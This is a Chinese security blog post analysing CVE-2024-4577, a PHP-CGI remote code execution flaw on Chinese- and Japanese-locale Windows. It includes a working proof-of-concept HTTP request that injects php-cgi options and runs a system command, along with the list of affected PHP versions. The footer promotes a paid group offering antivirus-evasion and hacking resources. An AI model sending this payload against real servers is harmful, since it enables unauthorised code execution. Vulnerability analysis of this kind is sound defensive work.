实战 | 最新PHP-RCE+详细分析(CVE-2024-4577)
实战 | 最新PHP-RCE+详细分析(CVE-2024-4577)
渗透安全团队 2024-06-10 21:07
前言
最新PHP-RCE详细分析(CVE-2024-4577)
是一种对
CVE-2012-1823的一种绕过
不是星标不推送文章了。
师傅也不想吧~
快把
极梦C设置成星标吧。
前身
最新的php rce是建立在CVE-2012-1823基础上的一次编码绕过,而CVE-2012-1823的成因简单来说就是在CGI模式下,用户请求的querystring被作为了php-cgi的参数传递给php-cgi.exe成功解析执行,造成RCE。
php-cgi.exe接收的参数
-c 指定php.ini文件的位置
-n 不要加载php.ini文件
-d 指定配置项
-b 启动fastcgi进程
-s 显示文件源码
-T 执行指定次该文件
-h和-? 显示帮助
-s查看元件源码
攻击过程
urlcode编码中%3D为=,%3A为: -d allow_url_include=on控制允许在include、include_once、require、require_once等函数中使用URL作为文件名,可以远程url加载执行php代码-d auto_prepend_file=php://inputphp://input流通常用于读取POST数据,而-d auto_prepend_file则指定了包含的php脚本为POST输入
所以使用以下payload就使得能够允许文件包含,而文件包含是读入的POST数据流作为脚本.
poc如下:
POST /index.php?-d+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input HTTP/1.1
Host: xxxxx.com
Content-Length: 25
<?php system("whoami");?>
后面官方修补的补丁中也就是把”-”这个字符给匹配过滤了
而最新版的RCE之所以只会影响繁体中文、简体中文、日文这三个语言版本的windows系统,
就是因为有大神找到了-的编码绕过方式,在我们带入参数拼接前宽字节会被转换,0x00ad显然不是一个完整的字节,而是一部分字节。
而在中文GBK编码中正好可以找到一个-来对其进行%ad编码从而绕过
实战截图
总结
1.具有简体中文、繁体中文、日文的Windows系统,支持bestfit936 GBK编码
-
开发是在CGI(单PHP)环境中,利用条件很苛刻
-
PHP局限在一定的版本
提醒
phpstudy集成中没漏洞版本。
漏洞版本:
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29
★
付费圈子
欢 迎 加 入 星 球 !
代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员
进成员内部群
星球的最近主题和星球内部工具一些展示****
加入安全交流群
关 注 有 礼
关注下方公众号回复“
666
”可以领取一套领取黑客成长秘籍
还在等什么?赶紧点击下方名片关注学习吧!
推荐阅读
免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为此
承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦